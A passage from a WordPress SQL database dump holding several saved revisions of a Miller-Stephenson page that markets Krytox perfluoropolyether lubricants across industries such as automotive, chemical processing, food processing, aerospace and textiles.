parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:10:04', '2016-09-28 17:10:04', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2090, 2, '2016-09-28 17:11:55', '2016-09-28 17:11:55', '[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:11:55', '2016-09-28 17:11:55', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2091, 2, '2016-09-28 17:12:25', '2016-09-28 17:12:25', '[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="Medium button" link="https://" target=""]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated 